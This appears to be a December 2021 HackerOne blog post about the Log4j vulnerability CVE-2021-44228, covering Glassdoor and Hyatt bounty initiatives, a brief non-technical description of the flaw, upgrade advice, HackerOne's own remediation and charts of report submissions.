December 14 Update: Several HackerOne customers launched Log4j-specific initiatives for hackers working or wanting to start bug hunting in their bug bounty programs. They include Glassdoor and Hyatt, among others. See below for more information:

Glassdoor—Glassdoor has patched most of the log4j vulnerable(CVE-2021-44228) applications over the weekend. If you happen to find any endpoints that are vulnerable to log4shell(CVE-2021-44228) please report it to us we will pay double our critical bounty up to $5,000. Detections in the form of pingbacks that include host information such as hostname or IP are acceptable and preferable. Please share your IP when you get the pingback for us to triage your reports faster.

For researchers interested in this initiative, go to https://hackerone.com/glassdoor.

Hyatt—We believe we have taken adequate steps to protect our external-facing environment—code assurance, detective controls, and protective controls—from the recently-discovered vulnerability in the log4j library. We want to ensure we take all precautions to protect our guests and colleagues, however, throughout this week— ending Sunday, December 20, we are creating a super-critical category for successful remote code execution of CVE-2021-44228 on any in-scope assets. The payout for this category will be US$25,000. As always, thank you for your important contributions to the safety of our guests and colleagues. Happy hunting!

For researchers interested in this initiative go to https://hackerone.com/hyatt.

The newly discovered critical security zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classified as severe, allowing unauthenticated remote code execution. It’s being actively exploited across the globe, and cyberattacks using Log4j continue to grow daily. The vulnerability was reported by Chen Zhaojun of Alibaba Cloud Security Team and disclosed by The Apache Software Foundation on December 9th.

Technical Details of Log4j

The Log4j vulnerability (CVE-2021-44228) triggers because log messages were interpreted as a special language, and one of the abilities of that language is to execute arbitrary Java classes. The result is a powerful remote code execution (RCE) vulnerability. The CVSS score is the highest possible, 10.0.

To remediate this vulnerability, organizations must update all affected instances of Log4j to version 2.15.0. HackerOne is recommending that our customers only consider a version update at this time.  

Apache’s official Log4j’s security advisory, including updated information, can be found here.

What HackerOne Has Done Internally

HackerOne identified several internal non-production services we run as tertiary architecture that were impacted by Log4j. We immediately put mitigations in place and patched them when the library updates were released. We believe we are fully remediated and continue to remain alert and vigilant. In addition, through our own Bug Bounty Program, we’ve announced a substantial bounty for any Log4j vulnerability exploits against HackerOne.

What HackerOne is Seeing With Customers

Since the Log4j vulnerability was first reported on December 9, HackerOne has received numerous customer submissions of Log4j vulnerabilities found. These raw numbers may be greater than the number of instances of the vulnerability. See below for graphics of these reports.

HackerOne Report of Log4j Vulnerability Submissions by Day

Log4j submissions by day
Graph 1: Log4j Vulnerability Report Submissions by Day

HackerOne Report of Cumulative Log4J Vulnerability Report Submissions

Cumulative
Graph 2: HackerOne Cumulative Log4j Vulnerability Report Submissions

HackerOne will continue to monitor the Log4j vulnerability and its impact on the industry and our customers. We will regularly post updates regarding this significant cybersecurity event.

Posted by Charlie